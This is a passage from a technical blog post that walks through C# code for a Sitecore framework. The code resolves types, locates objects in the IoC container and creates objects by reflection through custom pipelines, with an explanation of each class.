using System.Linq;
using Sandbox.Foundation.ObjectResolution.Models.Resolvers.TypeResolvers;
using Sandbox.Foundation.ObjectResolution.Services.Factories.Resolvers.TypeResolvers;
using Sandbox.Foundation.ObjectResolution.Services.Resolvers.TypeResolvers;

namespace Sandbox.Foundation.ObjectResolution.Pipelines.ResolveType.ResolveTypeProcessor
{
    public class ResolveType : ResolveProcessor<ResolveTypeArgs>, IResolveType
    {
        private readonly ITypeResolverArgumentsFactory _typeResolverArgumentsFactory;

        public ResolveType(ITypeResolverArgumentsFactory typeResolverArgumentsFactory)
        {
            _typeResolverArgumentsFactory = typeResolverArgumentsFactory;
        }

        protected override bool CanProcess(ResolveTypeArgs args) => base.CanProcess(args) && args.TypeResolvers != null && args.TypeResolvers.Any() && !string.IsNullOrWhiteSpace(args.TypeName);

        protected override void Execute(ResolveTypeArgs args) => args.Type = Resolve(args);

        protected virtual Type Resolve(ResolveTypeArgs args)
        {
            Type type = null;
            if (args.UseTypeCache)
            {
                type = GetTypeFromCache(args);
            }

            if (type == null)
            {
                type = GetTypeInfo(args);
            }

            return type;
        }

        protected virtual Type GetTypeInfo(ResolveTypeArgs args)
        {
            TypeResolverArguments arguments = CreateTypeResolverArguments(args);
            if (arguments == null)
            {
                return null;
            }

            foreach (ITypeResolver typeResolver in args.TypeResolvers)
            {
                Type type = typeResolver.Resolve(arguments);
                if (type != null)
                {
                    return type;
                }
            }

            return null;
        }

        protected virtual Type GetTypeFromCache(ResolveTypeArgs args) => args.TypeCacher.GetTypeFromCache(args.TypeName);

        protected virtual TypeResolverArguments CreateTypeResolverArguments(ResolveTypeArgs args) => _typeResolverArgumentsFactory.CreateTypeResolverArguments(args);
    }
}

Just as in the <resolveItem /> pipeline further up in this post, the processor above iterates over the collection of "resolvers" on the PipelineArgs instance (in this case, the TypeResolvers), passing an arguments instance, created by the factory defined further up, to the Resolve() method on each.
I then created the following settings class for the service class that will wrap the <resolveType /> pipeline:

namespace Sandbox.Foundation.ObjectResolution.Models.Resolvers.TypeResolvers
{
    public class TypeResolverServiceSettings
    {
        public string ResolveTypePipelineName { get; set; }
    }
}

The value of the ResolveTypePipelineName property will come from the Sitecore patch file towards the bottom of this post. I then created the following interface for the service class that will wrap the pipeline; if you are a design patterns buff, this is an example of the Adapter pattern:

namespace Sandbox.Foundation.ObjectResolution.Services.Resolvers.TypeResolvers
{
    public interface ITypeResolverService : ITypeResolver
    {
    }
}

The following class implements the interface above:

using System;
using Sitecore.Abstractions;
using Sandbox.Foundation.ObjectResolution.Models.Resolvers.TypeResolvers;
using Sandbox.Foundation.ObjectResolution.Pipelines.ResolveType;
using Sandbox.Foundation.ObjectResolution.Services.Factories.Resolvers.TypeResolvers;

namespace Sandbox.Foundation.ObjectResolution.Services.Resolvers.TypeResolvers
{
    public class TypeResolverService : PipelineObjectResolver<TypeResolverArguments, ResolveTypeArgs, Type>, ITypeResolverService
    {
        private readonly TypeResolverServiceSettings _settings;
        private readonly ITypeResolverArgumentsFactory _typeResolverArgumentsFactory;

        public TypeResolverService(TypeResolverServiceSettings settings, ITypeResolverArgumentsFactory typeResolverArgumentsFactory, BaseCorePipelineManager corePipelineManager)
            : base(corePipelineManager)
        {
            _settings = settings;
            _typeResolverArgumentsFactory = typeResolverArgumentsFactory;
        }

        protected override Type GetObject(ResolveTypeArgs args)
        {
            return args.Type;
        }

        protected override ResolveTypeArgs CreatePipelineArgs(TypeResolverArguments arguments) => _typeResolverArgumentsFactory.CreateResolveTypeArgs(arguments);

        protected override string GetPipelineName() => _settings.ResolveTypePipelineName;
    }
}

I'm not going to go into details about the class above, as it's just like the other service class which wraps the <resolveItem /> pipeline defined further above in this post. Still following? We're almost there. 😉
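As a quick usage sketch of my own: a consumer never sees the pipeline, only the ITypeResolver contract. This assumes TypeResolverArguments has a settable TypeName property, which the factories in this post suggest:

using System;
using Sandbox.Foundation.ObjectResolution.Models.Resolvers.TypeResolvers;
using Sandbox.Foundation.ObjectResolution.Services.Resolvers.TypeResolvers;

// Hypothetical consumer class showing the adapter in use.
public class TypeNamePrinter
{
    private readonly ITypeResolverService _typeResolverService;

    public TypeNamePrinter(ITypeResolverService typeResolverService)
    {
        _typeResolverService = typeResolverService;
    }

    public string GetFullName(string typeName)
    {
        // The service runs the <resolveType /> pipeline behind this one call.
        Type type = _typeResolverService.Resolve(new TypeResolverArguments { TypeName = typeName });

        return type?.FullName;
    }
}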
<locateObject />

So we now have a way to resolve Items and Types; next we need to take a resolved Type and find an object for it in the IoC container. I created a PipelineArgs class for a pipeline that does just that:

using System;
using System.Collections.Generic;
using Sitecore.Data;
using Sitecore.Data.Items;
using Sitecore.Globalization;
using Sitecore.Pipelines;
using Sandbox.Foundation.ObjectResolution.Services.Resolvers.ObjectLocators;
using Sandbox.Foundation.ObjectResolution.Services.Resolvers.TypeResolvers;

namespace Sandbox.Foundation.ObjectResolution.Pipelines.LocateObject
{
    public class LocateObjectArgs : PipelineArgs
    {
        public Database Database { get; set; }
        public string ItemPath { get; set; }
        public Language Language { get; set; }
        public Item Item { get; set; }
        public string TypeFieldName { get; set; }
        public string TypeName { get; set; }
        public bool UseTypeCache { get; set; }
        public ITypeResolver TypeResolver { get; set; }
        public Type Type { get; set; }
        public IList<IObjectLocator> Locators { get; set; } = new List<IObjectLocator>();
        public object Object { get; set; }
    }
}

In reality, this next pipeline can supply an object from anywhere; it doesn't have to come from an IoC container, but that's what I'm doing here. I did, however, make it extendable so you can source an object from wherever you want, even from the Post Office. 😉

I then created the following arguments object for service classes that will "locate" objects:

using System;
using Sitecore.Data;
using Sitecore.Data.Items;
using Sitecore.Globalization;

namespace Sandbox.Foundation.ObjectResolution.Models.Resolvers.ObjectLocators
{
    public class ObjectLocatorArguments
    {
        public Database Database { get; set; }
        public Language Language { get; set; }
        public string ItemPath { get; set; }
        public Item Item { get; set; }
        public string TypeFieldName { get; set; }
        public string TypeName { get; set; }
        public Type Type { get; set; }
        public bool UseTypeCache { get; set; }
    }
}

As I had done for the previous two "resolvers", I created a factory to create arguments objects, both for the pipeline and for the service classes:

using System;
using Sitecore.Data;
using Sitecore.Data.Items;
using Sitecore.Globalization;
using Sandbox.Foundation.ObjectResolution.Models.Resolvers.ObjectLocators;
using Sandbox.Foundation.ObjectResolution.Pipelines.LocateObject;
using Sandbox.Foundation.ObjectResolution.Pipelines.ResolveObject;

namespace Sandbox.Foundation.ObjectResolution.Services.Factories.Resolvers.ObjectLocators
{
    public interface IObjectLocatorArgumentsFactory
    {
        ObjectLocatorArguments CreateObjectLocatorArguments(ResolveObjectArgs args);

        ObjectLocatorArguments CreateObjectLocatorArguments(LocateObjectArgs args);

        ObjectLocatorArguments CreateObjectLocatorArguments(Database database = null, Language language = null, string itemPath = null, Item item = null, string typeFieldName = null, string typeName = null, Type type = null, bool useTypeCache = false);

        LocateObjectArgs CreateLocateObjectArgs(ObjectLocatorArguments arguments);

        LocateObjectArgs CreateLocateObjectArgs(Database database = null, Language language = null, string itemPath = null, Item item = null, string typeFieldName = null, string typeName = null, Type type = null, bool useTypeCache = false);
    }
}

using System;
using Sitecore.Data;
using Sitecore.Data.Items;
using Sitecore.Globalization;
using Sandbox.Foundation.ObjectResolution.Models.Resolvers.ObjectLocators;
using Sandbox.Foundation.ObjectResolution.Pipelines.LocateObject;
using Sandbox.Foundation.ObjectResolution.Pipelines.ResolveObject;

namespace Sandbox.Foundation.ObjectResolution.Services.Factories.Resolvers.ObjectLocators
{
    public class ObjectLocatorArgumentsFactory : IObjectLocatorArgumentsFactory
    {
        public ObjectLocatorArguments CreateObjectLocatorArguments(ResolveObjectArgs args)
        {
            if (args == null)
            {
                return null;
            }

            return CreateObjectLocatorArguments(args.Database, args.Language, args.ItemPath, args.Item, args.TypeFieldName, args.TypeName, args.Type, args.UseTypeCache);
        }

        public ObjectLocatorArguments CreateObjectLocatorArguments(LocateObjectArgs args)
        {
            if (args == null)
            {
                return null;
            }

            return CreateObjectLocatorArguments(args.Database, args.Language, args.ItemPath, args.Item, args.TypeFieldName, args.TypeName, args.Type, args.UseTypeCache);
        }

        public ObjectLocatorArguments CreateObjectLocatorArguments(Database database = null, Language language = null, string itemPath = null, Item item = null, string typeFieldName = null, string typeName = null, Type type = null, bool useTypeCache = false)
        {
            return new ObjectLocatorArguments
            {
                Database = database,
                Language = language,
                ItemPath = itemPath,
                Item = item,
                TypeFieldName = typeFieldName,
                TypeName = typeName,
                Type = type,
                UseTypeCache = useTypeCache
            };
        }

        public LocateObjectArgs CreateLocateObjectArgs(ObjectLocatorArguments arguments)
        {
            if (arguments == null)
            {
                return null;
            }

            return CreateLocateObjectArgs(arguments.Database, arguments.Language, arguments.ItemPath, arguments.Item, arguments.TypeFieldName, arguments.TypeName, arguments.Type, arguments.UseTypeCache);
        }

        public LocateObjectArgs CreateLocateObjectArgs(Database database = null, Language language = null, string itemPath = null, Item item = null, string typeFieldName = null, string typeName = null, Type type = null, bool useTypeCache = false)
        {
            return new LocateObjectArgs
            {
                Database = database,
                Language = language,
                ItemPath = itemPath,
                Item = item,
                TypeFieldName = typeFieldName,
                TypeName = typeName,
                Type = type,
                UseTypeCache = useTypeCache
            };
        }
    }
}

The class above implements the factory interface and just creates argument objects for both the pipeline and the service classes. (Note that both creation methods now copy the useTypeCache flag onto the arguments; the flag would otherwise be silently dropped.)

I then defined the following interface for a pipeline processor to set the ITypeResolver (defined way up above in this post):

namespace Sandbox.Foundation.ObjectResolution.Pipelines.LocateObject.SetTypeResolverProcessor
{
    public interface ISetTypeResolver
    {
        void Process(LocateObjectArgs args);
    }
}

This class implements the interface above:

using Sandbox.Foundation.ObjectResolution.Services.Resolvers.TypeResolvers;

namespace Sandbox.Foundation.ObjectResolution.Pipelines.LocateObject.SetTypeResolverProcessor
{
    public class SetTypeResolver : ResolveProcessor<LocateObjectArgs>, ISetTypeResolver
    {
        private readonly ITypeResolverService _typeResolverService;

        public SetTypeResolver(ITypeResolverService typeResolverService)
        {
            _typeResolverService = typeResolverService;
        }

        protected override bool CanProcess(LocateObjectArgs args) => base.CanProcess(args) && args.TypeResolver == null;

        protected override void Execute(LocateObjectArgs args)
        {
            args.TypeResolver = GetTypeResolver();
        }

        protected virtual ITypeResolver GetTypeResolver() => _typeResolverService;
    }
}

In the class above, I'm injecting the ITypeResolverService into its constructor (this is the service class that wraps the <resolveType /> pipeline defined further up) and setting it on the LocateObjectArgs instance if it's not already set.
Next, I created the following interface for a processor that will "resolve" the Type from the TypeResolver set on the LocateObjectArgs instance:

namespace Sandbox.Foundation.ObjectResolution.Pipelines.LocateObject.ResolveTypeProcessor
{
    public interface IResolveType
    {
        void Process(LocateObjectArgs args);
    }
}

The following class implements the interface above:

using System;
using Sandbox.Foundation.ObjectResolution.Models.Resolvers.TypeResolvers;
using Sandbox.Foundation.ObjectResolution.Services.Factories.Resolvers.TypeResolvers;

namespace Sandbox.Foundation.ObjectResolution.Pipelines.LocateObject.ResolveTypeProcessor
{
    public class ResolveType : ResolveProcessor<LocateObjectArgs>, IResolveType
    {
        private readonly ITypeResolverArgumentsFactory _typeResolverArgumentsFactory;

        public ResolveType(ITypeResolverArgumentsFactory typeResolverArgumentsFactory)
        {
            _typeResolverArgumentsFactory = typeResolverArgumentsFactory;
        }

        protected override bool CanProcess(LocateObjectArgs args) => base.CanProcess(args) && args.Type == null && args.TypeResolver != null;

        protected override void Execute(LocateObjectArgs args)
        {
            args.Type = Resolve(args);
        }

        protected virtual Type Resolve(LocateObjectArgs args)
        {
            TypeResolverArguments arguments = CreateTypeResolverArguments(args);

            if (arguments == null)
            {
                return null;
            }

            return args.TypeResolver.Resolve(arguments);
        }

        protected virtual TypeResolverArguments CreateTypeResolverArguments(LocateObjectArgs args) => _typeResolverArgumentsFactory.CreateTypeResolverArguments(args);
    }
}

The class above just "resolves" the Type using the TypeResolver set on the LocateObjectArgs instance. Nothing more to see. 😉

I then defined the following interface for a family of classes that "locate" objects from somewhere (perhaps a magical place 😉):

using Sandbox.Foundation.ObjectResolution.Models.Resolvers.ObjectLocators;

namespace Sandbox.Foundation.ObjectResolution.Services.Resolvers.ObjectLocators
{
    public interface IObjectLocator
    {
        object Resolve(ObjectLocatorArguments arguments);
    }
}

Well, we can't use much magic in this solution, so I'm going to "locate" things in the Sitecore IoC container. I defined the following interface for a class that will employ Service Locator to find objects there:

namespace Sandbox.Foundation.ObjectResolution.Services.Resolvers.ObjectLocators
{
    public interface IServiceProviderLocator : IObjectLocator
    {
    }
}

This class implements the interface above:

using System;
using Sitecore.DependencyInjection;
using Sandbox.Foundation.ObjectResolution.Models.Resolvers.ObjectLocators;

namespace Sandbox.Foundation.ObjectResolution.Services.Resolvers.ObjectLocators
{
    public class ServiceProviderLocator : IServiceProviderLocator
    {
        private readonly IServiceProvider _serviceProvider;

        public ServiceProviderLocator()
        {
            _serviceProvider = GetServiceProvider();
        }

        protected virtual IServiceProvider GetServiceProvider()
        {
            return ServiceLocator.ServiceProvider;
        }

        public object Resolve(ObjectLocatorArguments arguments)
        {
            if (arguments == null || arguments.Type == null)
            {
                return null;
            }

            return GetService(arguments.Type);
        }

        protected virtual object GetService(Type type) => _serviceProvider.GetService(type);
    }
}

In the class above, I'm just passing a Type to the System.IServiceProvider's GetService() method; the IServiceProvider instance is grabbed from the ServiceProvider static member on the Sitecore.DependencyInjection.ServiceLocator static class.
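Here is a hedged sketch of what a call through this locator amounts to (BaseLog is my example of a type Sitecore typically registers in its container; substitute anything you know is registered):

using Sandbox.Foundation.ObjectResolution.Models.Resolvers.ObjectLocators;
using Sandbox.Foundation.ObjectResolution.Services.Resolvers.ObjectLocators;

public static class ServiceProviderLocatorDemo
{
    public static object Run()
    {
        IObjectLocator locator = new ServiceProviderLocator();

        // Returns null when the arguments or Type are null, or when the container
        // has no registration for the requested Type.
        return locator.Resolve(new ObjectLocatorArguments
        {
            Type = typeof(Sitecore.Abstractions.BaseLog) // example registration, an assumption on my part
        });
    }
}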
Next, I need a processor class to add an instance of the Service Locator IObjectLocator class above to the collection of IObjectLocator instances on the LocateObjectArgs instance, so I defined the following interface for a processor class that does just that:

namespace Sandbox.Foundation.ObjectResolution.Pipelines.LocateObject.AddDefaultObjectLocatorProcessor
{
    public interface IAddDefaultObjectLocator
    {
        void Process(LocateObjectArgs args);
    }
}

Here's the implementation class for the interface above:

using Sandbox.Foundation.ObjectResolution.Services.Resolvers.ObjectLocators;

namespace Sandbox.Foundation.ObjectResolution.Pipelines.LocateObject.AddDefaultObjectLocatorProcessor
{
    public class AddDefaultObjectLocator : ResolveProcessor<LocateObjectArgs>, IAddDefaultObjectLocator
    {
        private readonly IServiceProviderLocator _serviceProviderLocator;

        public AddDefaultObjectLocator(IServiceProviderLocator serviceProviderLocator)
        {
            _serviceProviderLocator = serviceProviderLocator;
        }

        protected override bool CanProcess(LocateObjectArgs args) => base.CanProcess(args) && args.Locators != null;

        protected override void Execute(LocateObjectArgs args) => args.Locators.Add(GetObjectLocator());

        protected virtual IObjectLocator GetObjectLocator() => _serviceProviderLocator;
    }
}

It's just adding the IServiceProviderLocator instance to the Locators collection on the LocateObjectArgs instance.

Great, so we have things that can "locate" objects, but we still need a processor that executes that step to actually find those objects. The following interface is for a processor class that does just that:

namespace Sandbox.Foundation.ObjectResolution.Pipelines.LocateObject.LocateObjectProcessor
{
    public interface ILocateObject
    {
        void Process(LocateObjectArgs args);
    }
}

And here's its implementation class:

using System.Linq;
using Sandbox.Foundation.ObjectResolution.Models.Resolvers.ObjectLocators;
using Sandbox.Foundation.ObjectResolution.Services.Factories.Resolvers.ObjectLocators;
using Sandbox.Foundation.ObjectResolution.Services.Resolvers.ObjectLocators;

namespace Sandbox.Foundation.ObjectResolution.Pipelines.LocateObject.LocateObjectProcessor
{
    public class LocateObject : ResolveProcessor<LocateObjectArgs>, ILocateObject
    {
        private readonly IObjectLocatorArgumentsFactory _objectLocatorArgumentsFactory;

        public LocateObject(IObjectLocatorArgumentsFactory objectLocatorArgumentsFactory)
        {
            _objectLocatorArgumentsFactory = objectLocatorArgumentsFactory;
        }

        protected override bool CanProcess(LocateObjectArgs args) => base.CanProcess(args) && args.Locators != null && args.Locators.Any() && args.Type != null;

        protected override void Execute(LocateObjectArgs args) => args.Object = Resolve(args);

        protected virtual object Resolve(LocateObjectArgs args)
        {
            ObjectLocatorArguments arguments = CreateObjectLocatorArguments(args);

            if (arguments == null)
            {
                return null;
            }

            foreach (IObjectLocator objectLocator in args.Locators)
            {
                object obj = objectLocator.Resolve(arguments);

                if (obj != null)
                {
                    return obj;
                }
            }

            return null;
        }

        protected virtual ObjectLocatorArguments CreateObjectLocatorArguments(LocateObjectArgs args) => _objectLocatorArgumentsFactory.CreateObjectLocatorArguments(args);
    }
}

As I had done in the previous pipelines, I'm just iterating over a collection of classes that "resolve" a particular thing; here, it's all IObjectLocator instances set on the LocateObjectArgs instance. If one of them finds the object we are looking for, we just set it on the LocateObjectArgs instance.
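Since LocateObject keeps the first non-null hit from args.Locators, additional sources can be bolted on alongside the Service Locator one. Here is a hedged sketch of a hypothetical second locator (StaticObjectLocator is mine, not part of this solution) backed by a static map:

using System;
using System.Collections.Concurrent;
using Sandbox.Foundation.ObjectResolution.Models.Resolvers.ObjectLocators;

namespace Sandbox.Foundation.ObjectResolution.Services.Resolvers.ObjectLocators
{
    // Hypothetical locator that serves pre-registered singletons from a static map.
    public class StaticObjectLocator : IObjectLocator
    {
        private static readonly ConcurrentDictionary<Type, object> Instances = new ConcurrentDictionary<Type, object>();

        public static void Register(Type type, object instance) => Instances.TryAdd(type, instance);

        public object Resolve(ObjectLocatorArguments arguments)
        {
            if (arguments == null || arguments.Type == null)
            {
                return null;
            }

            object instance;

            // Returning null lets the next IObjectLocator in the chain try.
            return Instances.TryGetValue(arguments.Type, out instance) ? instance : null;
        }
    }
}

Wiring it in would just take another "add" processor like the one above, registered in <locateObject />.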
As I had done for the other pipelines, I created a service class that wraps the new pipeline. The following class serves as a settings class for that service:

namespace Sandbox.Foundation.ObjectResolution.Models.Resolvers.ObjectLocators
{
    public class ObjectLocatorServiceSettings
    {
        public string LocateObjectPipelineName { get; set; }
    }
}

An instance of the class above will be created by the Sitecore Configuration Factory, and its LocateObjectPipelineName property will contain a value defined in the Sitecore patch file further down in this post. I then created the following interface for the service class that will wrap this new pipeline:

namespace Sandbox.Foundation.ObjectResolution.Services.Resolvers.ObjectLocators
{
    public interface IObjectLocatorService : IObjectLocator
    {
    }
}

Here's the class that implements the interface above:

using Sitecore.Abstractions;
using Sandbox.Foundation.ObjectResolution.Models.Resolvers.ObjectLocators;
using Sandbox.Foundation.ObjectResolution.Pipelines.LocateObject;
using Sandbox.Foundation.ObjectResolution.Services.Factories.Resolvers.ObjectLocators;

namespace Sandbox.Foundation.ObjectResolution.Services.Resolvers.ObjectLocators
{
    public class ObjectLocatorService : PipelineObjectResolver<ObjectLocatorArguments, LocateObjectArgs, object>, IObjectLocatorService
    {
        private readonly ObjectLocatorServiceSettings _settings;
        private readonly IObjectLocatorArgumentsFactory _objectLocatorArgumentsFactory;

        public ObjectLocatorService(ObjectLocatorServiceSettings settings, IObjectLocatorArgumentsFactory objectLocatorArgumentsFactory, BaseCorePipelineManager corePipelineManager)
            : base(corePipelineManager)
        {
            _settings = settings;
            _objectLocatorArgumentsFactory = objectLocatorArgumentsFactory;
        }

        protected override object GetObject(LocateObjectArgs args)
        {
            return args.Object;
        }

        protected override LocateObjectArgs CreatePipelineArgs(ObjectLocatorArguments arguments) => _objectLocatorArgumentsFactory.CreateLocateObjectArgs(arguments);

        protected override string GetPipelineName() => _settings.LocateObjectPipelineName;
    }
}

I'm not going to talk much about the class above; it follows the same pattern as the other classes that wrap their respective pipelines.
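All of these wrapper services derive from the PipelineObjectResolver base class defined earlier in this post. I won't repeat its code here, but based on the members the subclasses override, a minimal reconstruction could look like the sketch below (my approximation, not the post's verbatim code; it assumes BaseCorePipelineManager.Run(string, PipelineArgs), which Sitecore.Abstractions provides):

using Sitecore.Abstractions;
using Sitecore.Pipelines;

// Approximate shape of the wrapper pattern shared by TypeResolverService,
// ObjectLocatorService, ObjectCreatorService and ObjectResolverService.
public abstract class PipelineObjectResolver<TArguments, TPipelineArgs, TResult>
    where TPipelineArgs : PipelineArgs
{
    private readonly BaseCorePipelineManager _corePipelineManager;

    protected PipelineObjectResolver(BaseCorePipelineManager corePipelineManager)
    {
        _corePipelineManager = corePipelineManager;
    }

    public virtual TResult Resolve(TArguments arguments)
    {
        TPipelineArgs args = CreatePipelineArgs(arguments);

        if (args == null)
        {
            return default(TResult);
        }

        // Run the named pipeline, then pull the result off the args instance.
        _corePipelineManager.Run(GetPipelineName(), args);

        return GetObject(args);
    }

    protected abstract TPipelineArgs CreatePipelineArgs(TArguments arguments);

    protected abstract string GetPipelineName();

    protected abstract TResult GetObject(TPipelineArgs args);
}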
<createObject />

So what happens when we cannot find an object via the <locateObject /> pipeline? Well, let's create it. I defined the following PipelineArgs class for a new pipeline that creates objects:

using System;
using System.Collections.Generic;
using Sitecore.Data;
using Sitecore.Data.Items;
using Sitecore.Globalization;
using Sitecore.Pipelines;
using Sandbox.Foundation.ObjectResolution.Services.Cachers;
using Sandbox.Foundation.ObjectResolution.Services.Resolvers.ObjectCreators;
using Sandbox.Foundation.ObjectResolution.Services.Resolvers.TypeResolvers;

namespace Sandbox.Foundation.ObjectResolution.Pipelines.CreateObject
{
    public class CreateObjectArgs : PipelineArgs
    {
        public Database Database { get; set; }
        public string ItemPath { get; set; }
        public Language Language { get; set; }
        public Item Item { get; set; }
        public string TypeFieldName { get; set; }
        public string TypeName { get; set; }
        public ITypeResolver TypeResolver { get; set; }
        public Type Type { get; set; }
        public object[] Parameters { get; set; }
        public IList<IObjectCreator> Creators { get; set; } = new List<IObjectCreator>();
        public object Object { get; set; }
        public bool UseTypeCache { get; set; }
        public ITypeCacher TypeCacher { get; set; }
    }
}

I then defined the following arguments class for service classes that create objects:

using System;
using Sitecore.Data;
using Sitecore.Data.Items;
using Sitecore.Globalization;

namespace Sandbox.Foundation.ObjectResolution.Models.Resolvers.ObjectCreators
{
    public class ObjectCreatorArguments
    {
        public Database Database { get; set; }
        public Language Language { get; set; }
        public string ItemPath { get; set; }
        public Item Item { get; set; }
        public string TypeFieldName { get; set; }
        public string TypeName { get; set; }
        public Type Type { get; set; }
        public bool UseTypeCache { get; set; }
        public object[] Parameters { get; set; }
    }
}

Since the "new" keyword promotes tight coupling between classes, I created the following factory interface for classes that create the two argument types shown above:

using System;
using Sitecore.Data;
using Sitecore.Data.Items;
using Sitecore.Globalization;
using Sandbox.Foundation.ObjectResolution.Models.Resolvers.ObjectCreators;
using Sandbox.Foundation.ObjectResolution.Pipelines.CreateObject;
using Sandbox.Foundation.ObjectResolution.Pipelines.ResolveObject;

namespace Sandbox.Foundation.ObjectResolution.Services.Factories.Resolvers.ObjectCreators
{
    public interface IObjectCreatorArgumentsFactory
    {
        ObjectCreatorArguments CreateObjectCreatorArguments(ResolveObjectArgs args);

        ObjectCreatorArguments CreateObjectCreatorArguments(CreateObjectArgs args);

        ObjectCreatorArguments CreateObjectCreatorArguments(Database database = null, Language language = null, string itemPath = null, Item item = null, string typeFieldName = null, string typeName = null, Type type = null, bool useTypeCache = false, object[] parameters = null);

        CreateObjectArgs CreateCreateObjectArgs(ObjectCreatorArguments arguments);

        CreateObjectArgs CreateCreateObjectArgs(Database database = null, Language language = null, string itemPath = null, Item item = null, string typeFieldName = null, string typeName = null, Type type = null, bool useTypeCache = false, object[] parameters = null);
    }
}

The following class implements the interface above:

using System;
using Sitecore.Data;
using Sitecore.Data.Items;
using Sitecore.Globalization;
using Sandbox.Foundation.ObjectResolution.Models.Resolvers.ObjectCreators;
using Sandbox.Foundation.ObjectResolution.Pipelines.CreateObject;
using Sandbox.Foundation.ObjectResolution.Pipelines.ResolveObject;

namespace Sandbox.Foundation.ObjectResolution.Services.Factories.Resolvers.ObjectCreators
{
    public class ObjectCreatorArgumentsFactory : IObjectCreatorArgumentsFactory
    {
        public ObjectCreatorArguments CreateObjectCreatorArguments(ResolveObjectArgs args)
        {
            if (args == null)
            {
                return null;
            }

            return CreateObjectCreatorArguments(args.Database, args.Language, args.ItemPath, args.Item, args.TypeFieldName, args.TypeName, args.Type, args.UseTypeCache, args.ObjectCreationParameters);
        }

        public ObjectCreatorArguments CreateObjectCreatorArguments(CreateObjectArgs args)
        {
            if (args == null)
            {
                return null;
            }

            return CreateObjectCreatorArguments(args.Database, args.Language, args.ItemPath, args.Item, args.TypeFieldName, args.TypeName, args.Type, args.UseTypeCache, args.Parameters);
        }

        public ObjectCreatorArguments CreateObjectCreatorArguments(Database database = null, Language language = null, string itemPath = null, Item item = null, string typeFieldName = null, string typeName = null, Type type = null, bool useTypeCache = false, object[] parameters = null)
        {
            return new ObjectCreatorArguments
            {
                Database = database,
                Language = language,
                ItemPath = itemPath,
                Item = item,
                TypeFieldName = typeFieldName,
                TypeName = typeName,
                Type = type,
                UseTypeCache = useTypeCache,
                Parameters = parameters
            };
        }

        public CreateObjectArgs CreateCreateObjectArgs(ObjectCreatorArguments arguments)
        {
            if (arguments == null)
            {
                return null;
            }

            return CreateCreateObjectArgs(arguments.Database, arguments.Language, arguments.ItemPath, arguments.Item, arguments.TypeFieldName, arguments.TypeName, arguments.Type, arguments.UseTypeCache, arguments.Parameters);
        }

        public CreateObjectArgs CreateCreateObjectArgs(Database database = null, Language language = null, string itemPath = null, Item item = null, string typeFieldName = null, string typeName = null, Type type = null, bool useTypeCache = false, object[] parameters = null)
        {
            return new CreateObjectArgs
            {
                Database = database,
                Language = language,
                ItemPath = itemPath,
                Item = item,
                TypeFieldName = typeFieldName,
                TypeName = typeName,
                Type = type,
                UseTypeCache = useTypeCache,
                Parameters = parameters
            };
        }
    }
}

The class above just creates CreateObjectArgs and ObjectCreatorArguments instances. Let's jump into the bits that comprise the new pipeline. The following interface is for a processor class that sets the ITypeResolver on the CreateObjectArgs instance:

namespace Sandbox.Foundation.ObjectResolution.Pipelines.CreateObject.SetTypeResolverProcessor
{
    public interface ISetTypeResolver
    {
        void Process(CreateObjectArgs args);
    }
}

Here's the processor class that implements the interface above:

using Sandbox.Foundation.ObjectResolution.Services.Resolvers.TypeResolvers;

namespace Sandbox.Foundation.ObjectResolution.Pipelines.CreateObject.SetTypeResolverProcessor
{
    public class SetTypeResolver : ResolveProcessor<CreateObjectArgs>, ISetTypeResolver
    {
        private readonly ITypeResolverService _typeResolverService;

        public SetTypeResolver(ITypeResolverService typeResolverService)
        {
            _typeResolverService = typeResolverService;
        }

        protected override bool CanProcess(CreateObjectArgs args) => base.CanProcess(args) && args.Type == null && args.TypeResolver == null;

        protected override void Execute(CreateObjectArgs args)
        {
            args.TypeResolver = GetTypeResolver();
        }

        protected virtual ITypeResolver GetTypeResolver() => _typeResolverService;
    }
}

Nothing special going on; we've seen something like this before further up in this post. Now, we need a processor to "resolve" types.
The following interface is for a processor class which does just that:

namespace Sandbox.Foundation.ObjectResolution.Pipelines.CreateObject.ResolveTypeProcessor
{
    public interface IResolveType
    {
        void Process(CreateObjectArgs args);
    }
}

And here is the processor class that implements the interface above:

using System;
using Sandbox.Foundation.ObjectResolution.Models.Resolvers.TypeResolvers;
using Sandbox.Foundation.ObjectResolution.Services.Factories.Resolvers.TypeResolvers;

namespace Sandbox.Foundation.ObjectResolution.Pipelines.CreateObject.ResolveTypeProcessor
{
    public class ResolveType : ResolveProcessor<CreateObjectArgs>, IResolveType
    {
        private readonly ITypeResolverArgumentsFactory _typeResolverArgumentsFactory;

        public ResolveType(ITypeResolverArgumentsFactory typeResolverArgumentsFactory)
        {
            _typeResolverArgumentsFactory = typeResolverArgumentsFactory;
        }

        protected override bool CanProcess(CreateObjectArgs args) => base.CanProcess(args) && args.Type == null && args.TypeResolver != null;

        protected override void Execute(CreateObjectArgs args)
        {
            args.Type = Resolve(args);
        }

        protected virtual Type Resolve(CreateObjectArgs args)
        {
            TypeResolverArguments arguments = CreateTypeResolverArguments(args);

            if (arguments == null)
            {
                return null;
            }

            return args.TypeResolver.Resolve(arguments);
        }

        protected virtual TypeResolverArguments CreateTypeResolverArguments(CreateObjectArgs args) => _typeResolverArgumentsFactory.CreateTypeResolverArguments(args);
    }
}

I'm not going to discuss this much, as we've already seen something like it further up in this post. I then defined the following interface for a family of classes that create objects:

using Sandbox.Foundation.ObjectResolution.Models.Resolvers.ObjectCreators;

namespace Sandbox.Foundation.ObjectResolution.Services.Resolvers.ObjectCreators
{
    public interface IObjectCreator
    {
        object Resolve(ObjectCreatorArguments arguments);
    }
}

Since I'm not good at arts and crafts, we'll have to use reflection to create objects. The following interface is for a class that uses reflection to create objects:

namespace Sandbox.Foundation.ObjectResolution.Services.Resolvers.ObjectCreators
{
    public interface IReflectionObjectCreator : IObjectCreator
    {
    }
}

The following class implements the interface above:

using System.Linq;
using Sandbox.Foundation.ObjectResolution.Models.Resolvers.ObjectCreators;
using Sandbox.Foundation.ObjectResolution.Services.Reflection;

namespace Sandbox.Foundation.ObjectResolution.Services.Resolvers.ObjectCreators
{
    public class ReflectionObjectCreator : IReflectionObjectCreator
    {
        private readonly IReflectionUtilService _reflectionUtilService;

        public ReflectionObjectCreator(IReflectionUtilService reflectionUtilService)
        {
            _reflectionUtilService = reflectionUtilService;
        }

        public object Resolve(ObjectCreatorArguments arguments)
        {
            if (arguments == null || arguments.Type == null)
            {
                return null;
            }

            if (arguments.Parameters == null || !arguments.Parameters.Any())
            {
                return _reflectionUtilService.CreateObject(arguments.Type);
            }

            return _reflectionUtilService.CreateObject(arguments.Type, arguments.Parameters);
        }
    }
}

The class above just delegates to the injected IReflectionUtilService instance (defined way up above in this post) to create objects.
